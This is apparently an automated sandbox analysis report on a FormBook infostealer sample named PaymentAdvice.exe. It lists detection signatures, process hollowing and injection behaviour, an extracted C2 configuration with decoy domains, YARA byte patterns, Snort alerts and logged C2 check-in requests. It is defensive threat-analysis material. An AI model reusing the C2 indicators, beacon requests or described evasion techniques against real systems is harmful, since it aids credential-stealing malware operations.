Loading ...

Play interactive tourEdit tour

Analysis Report PaymentAdvice.exe

Overview

General Information

Sample Name:PaymentAdvice.exe
Analysis ID:383926
MD5:91937d3f9e93657c18129ff519b7f340
SHA1:d9acfebf2120d984d76bdf883094707305897691
SHA256:397fd95899f186c1385818c6b996f4cb410e266a84b2c134104d01675a822e27
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PaymentAdvice.exe (PID: 2852 cmdline: 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: 91937D3F9E93657C18129FF519B7F340)
    • PaymentAdvice.exe (PID: 5412 cmdline: 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: 91937D3F9E93657C18129FF519B7F340)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 5748 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 5964 cmdline: /c del 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.saturnkorp.net/c22b/"], "decoy": ["westendjanakpuri.com", "sylvianicolades.com", "xhvai.com", "vitalinfusionofarizona.com", "orangeecho.com", "middletonyork.net", "nature-powered.com", "securemanchester.com", "hispanicalinguablog.com", "vtz6whu5254xb1.xyz", "forceshutdown.com", "apointlessspace.net", "wildsoulsport.com", "baa-bee.com", "unmanglement.com", "njtiy.com", "misery-indexrain.com", "buybox.guru", "abolishlawinforcement.com", "healthforherraleigh.clinic", "merakart.com", "thetrentproject.com", "tobaccoroadinvitational.com", "sgdivergence.com", "skmoil.com", "bornforbetterthings.com", "tianyulian.com", "pwjol.com", "roab.store", "thebellabloom.com", "innerpeacehabits.com", "curtex.info", "worshipher.net", "puebloregentseniorliving.com", "profoundai.net", "yupinduoge.com", "draftsofsilence.com", "plataformaporelmarcanario.com", "grandrapidshemorrhoidclinic.com", "crossfut.net", "cobourgautoglass.com", "whowetrust.com", "anchor-little.com", "antiqollection.com", "wvregistration.com", "droplites.com", "creditiscrucial.com", "simdikikitap.com", "deltaeleveight.com", "webinast.com", "brandschutzglas.com", "brightsidebeans.com", "weatherdekniagara.com", "dajiangzhibo12.com", "transporteyflete.com", "dulzdude.com", "tmancar.com", "tristatecandlesupply.net", "thehealthierdonut.com", "francacheladesigns.com", "enerav.com", "highsiddityminks.com", "aitelco.net", "prulib.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.PaymentAdvice.exe.2680000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.PaymentAdvice.exe.2680000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.PaymentAdvice.exe.2680000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        2.2.PaymentAdvice.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.PaymentAdvice.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.saturnkorp.net/c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4mAvira URL Cloud: Label: malware
          Source: http://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4mAvira URL Cloud: Label: malware
          Source: www.saturnkorp.net/c22b/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.saturnkorp.net/c22b/"], "decoy": ["westendjanakpuri.com", "sylvianicolades.com", "xhvai.com", "vitalinfusionofarizona.com", "orangeecho.com", "middletonyork.net", "nature-powered.com", "securemanchester.com", "hispanicalinguablog.com", "vtz6whu5254xb1.xyz", "forceshutdown.com", "apointlessspace.net", "wildsoulsport.com", "baa-bee.com", "unmanglement.com", "njtiy.com", "misery-indexrain.com", "buybox.guru", "abolishlawinforcement.com", "healthforherraleigh.clinic", "merakart.com", "thetrentproject.com", "tobaccoroadinvitational.com", "sgdivergence.com", "skmoil.com", "bornforbetterthings.com", "tianyulian.com", "pwjol.com", "roab.store", "thebellabloom.com", "innerpeacehabits.com", "curtex.info", "worshipher.net", "puebloregentseniorliving.com", "profoundai.net", "yupinduoge.com", "draftsofsilence.com", "plataformaporelmarcanario.com", "grandrapidshemorrhoidclinic.com", "crossfut.net", "cobourgautoglass.com", "whowetrust.com", "anchor-little.com", "antiqollection.com", "wvregistration.com", "droplites.com", "creditiscrucial.com", "simdikikitap.com", "deltaeleveight.com", "webinast.com", "brandschutzglas.com", "brightsidebeans.com", "weatherdekniagara.com", "dajiangzhibo12.com", "transporteyflete.com", "dulzdude.com", "tmancar.com", "tristatecandlesupply.net", "thehealthierdonut.com", "francacheladesigns.com", "enerav.com", "highsiddityminks.com", "aitelco.net", "prulib.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PaymentAdvice.exeVirustotal: Detection: 32%Perma Link
          Source: PaymentAdvice.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PaymentAdvice.exeJoe Sandbox ML: detected
          Source: 2.2.PaymentAdvice.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.msiexec.exe.95a558.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.msiexec.exe.4b47960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.PaymentAdvice.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PaymentAdvice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: msiexec.pdb source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
          Source: Binary string: msiexec.pdbGCTL source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\78a9904c70914141b6b07ca4fbdcf1ff\Loader\Loader\Release\u58v4wo87.pdb source: PaymentAdvice.exe, 00000000.00000002.238262176.0000000073CA2000.00000002.00020000.sdmp, ic4muy4.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: PaymentAdvice.exe, 00000000.00000003.229993167.000000001F100000.00000004.00000001.sdmp, PaymentAdvice.exe, 00000002.00000002.278191881.00000000009D0000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.502133269.0000000004610000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PaymentAdvice.exe, msiexec.exe
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop ebx2_2_00406A95
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop edi2_2_0040C3CF
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop edi2_2_0040C390
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop edi2_2_00415681
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop ebx2_1_00406A95
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop edi2_1_0040C3CF
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop edi2_1_0040C390
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop ebx7_2_00386A95
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi7_2_0038C390
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi7_2_0038C3CF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi7_2_00395681

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.saturnkorp.net/c22b/
          Performs DNS queries to domains with low reputationShow sources
          Source: DNS query: www.vtz6whu5254xb1.xyz
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.abolishlawinforcement.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.webinast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.puebloregentseniorliving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.brandschutzglas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.hispanicalinguablog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.unmanglement.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.plataformaporelmarcanario.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.dajiangzhibo12.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.saturnkorp.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.sgdivergence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
          Source: Joe Sandbox ViewASN Name: WORLD4YOUAT WORLD4YOUAT
          Source: C:\Windows\explorer.exeCode function: 3_2_070A7302 getaddrinfo,setsockopt,recv,3_2_070A7302
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.abolishlawinforcement.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.webinast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.puebloregentseniorliving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.brandschutzglas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.hispanicalinguablog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.unmanglement.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.plataformaporelmarcanario.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.dajiangzhibo12.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.saturnkorp.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.sgdivergence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.abolishlawinforcement.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
